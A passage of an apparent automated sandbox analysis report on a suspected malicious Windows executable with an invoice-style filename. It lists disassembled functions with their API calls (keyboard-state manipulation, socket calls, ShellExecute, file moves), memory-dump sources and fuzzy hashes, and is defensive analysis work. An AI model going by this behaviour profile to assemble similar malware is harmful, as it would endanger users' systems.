                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                          • Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
                                          • Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                          • Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D
                                          Function 004670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                                            • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                            • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                                          • EnterCriticalSection.KERNEL32(?), ref: 00467130
                                          • _memmove.LIBCMT ref: 0046717E
                                          • _memmove.LIBCMT ref: 0046719B
                                          • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 256516436-0
                                          • Opcode ID: 5cc59522dc711bf3fe243e6e1917aced79d968ecf744907e001d73688ca29e76
                                          • Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
                                          • Opcode Fuzzy Hash: 5cc59522dc711bf3fe243e6e1917aced79d968ecf744907e001d73688ca29e76
                                          • Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9
                                          Function 004861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 004861EB
                                          • GetDC.USER32(00000000), ref: 004861F3
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          • Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                          • Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
                                          • Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                          • Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68
                                          Function 0046EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                            • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                          • _wcstok.LIBCMT ref: 0046EC94
                                          • _wcscpy.LIBCMT ref: 0046ED23
                                          • _memset.LIBCMT ref: 0046ED56
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                          • String ID: X
                                          • API String ID: 774024439-3081909835
                                          • Opcode ID: d6e1d5704a763b65c75ff422fc9549e5ef5795b94331fb4464b83197f6882e3a
                                          • Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
                                          • Opcode Fuzzy Hash: d6e1d5704a763b65c75ff422fc9549e5ef5795b94331fb4464b83197f6882e3a
                                          • Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B
                                          Function 00476B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00476C34
                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
                                          • inet_ntoa.WSOCK32(?), ref: 00476CA7
                                            • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
                                            • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
                                          • _strlen.LIBCMT ref: 00476D44
                                          • _memmove.LIBCMT ref: 00476DAD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                          • String ID:
                                          • API String ID: 3619996494-0
                                          • Opcode ID: b26197013ca06bdf935ebb7fa7d10b0a6269670c8655181fb272f8dd91729564
                                          • Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
                                          • Opcode Fuzzy Hash: b26197013ca06bdf935ebb7fa7d10b0a6269670c8655181fb272f8dd91729564
                                          • Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59
                                          Function 00401424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                          • Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
                                          • Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                          • Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9
                                          Function 0048B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindow.USER32(00C711A8), ref: 0048B3EB
                                          • IsWindowEnabled.USER32(00C711A8), ref: 0048B3F7
                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                                          • SendMessageW.USER32(00C711A8,000000B0,?,?), ref: 0048B512
                                          • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                                          • GetWindowLongW.USER32(00C711A8,000000EC), ref: 0048B571
                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                          • String ID:
                                          • API String ID: 4072528602-0
                                          • Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                          • Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
                                          • Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                          • Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98
                                          Function 0047F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0047F448
                                          • _memset.LIBCMT ref: 0047F511
                                          • ShellExecuteExW.SHELL32(?), ref: 0047F556
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                            • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                          • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                                          • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                          • String ID: @
                                          • API String ID: 3522835683-2766056989
                                          • Opcode ID: bc3d410e87ac89b06d51cd0e3322e6ce41cf3a0caf3fdd3db083c5eeea97c555
                                          • Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
                                          • Opcode Fuzzy Hash: bc3d410e87ac89b06d51cd0e3322e6ce41cf3a0caf3fdd3db083c5eeea97c555
                                          • Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88
                                          Function 00460F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(?), ref: 00460F8C
                                          • GetKeyboardState.USER32(?), ref: 00460FA1
                                          • SetKeyboardState.USER32(?), ref: 00461002
                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                          • Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
                                          • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                          • Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
                                          Function 00460D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(00000000), ref: 00460DA5
                                          • GetKeyboardState.USER32(?), ref: 00460DBA
                                          • SetKeyboardState.USER32(?), ref: 00460E1B
                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                          • Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
                                          • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                          • Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
                                          Function 004655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _wcsncpy$LocalTime
                                          • String ID:
                                          • API String ID: 2945705084-0
                                          • Opcode ID: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                          • Instruction ID: 7a6b7d837badcf90248cfae842bd011e2e93fbf2a36f5ea1b26b70f3dca78a8a
                                          • Opcode Fuzzy Hash: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                          • Instruction Fuzzy Hash: 5541B565D1022476CB11EBB59846ACFB7B8AF05311F90485BF508E3221FA78E285C7AE
                                          Function 0045D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                          • String ID: ,,I$DllGetClassObject
                                          • API String ID: 753597075-1683996018
                                          • Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                          • Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
                                          • Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                          • Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8
                                          Function 00463671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                            • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                          • lstrcmpiW.KERNEL32(?,?), ref: 004636B7
                                          • _wcscmp.LIBCMT ref: 004636D3
                                          • MoveFileW.KERNEL32(?,?), ref: 004636EB
                                          • _wcscat.LIBCMT ref: 00463733
                                          • SHFileOperationW.SHELL32(?), ref: 0046379F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 1377345388-1173974218
                                          • Opcode ID: 0993e5ca929c2efa997c1b424dbcfd90290d04f9ce8d0f9705211f6a3ce64837
                                          • Instruction ID: 4e874dc4fae4897927e7b4621483e23afab501f30efb2571b7469179fc3cc0d5
                                          • Opcode Fuzzy Hash: 0993e5ca929c2efa997c1b424dbcfd90290d04f9ce8d0f9705211f6a3ce64837
                                          • Instruction Fuzzy Hash: 1A418FB1508344AEC752EF65D4419DFB7E8AF88345F40082FB48AC3261FA38D689C75B
                                          Function 00487291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 004872AA
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                                          • IsMenu.USER32(?), ref: 00487369
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                                          • DrawMenuBar.USER32 ref: 004873C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
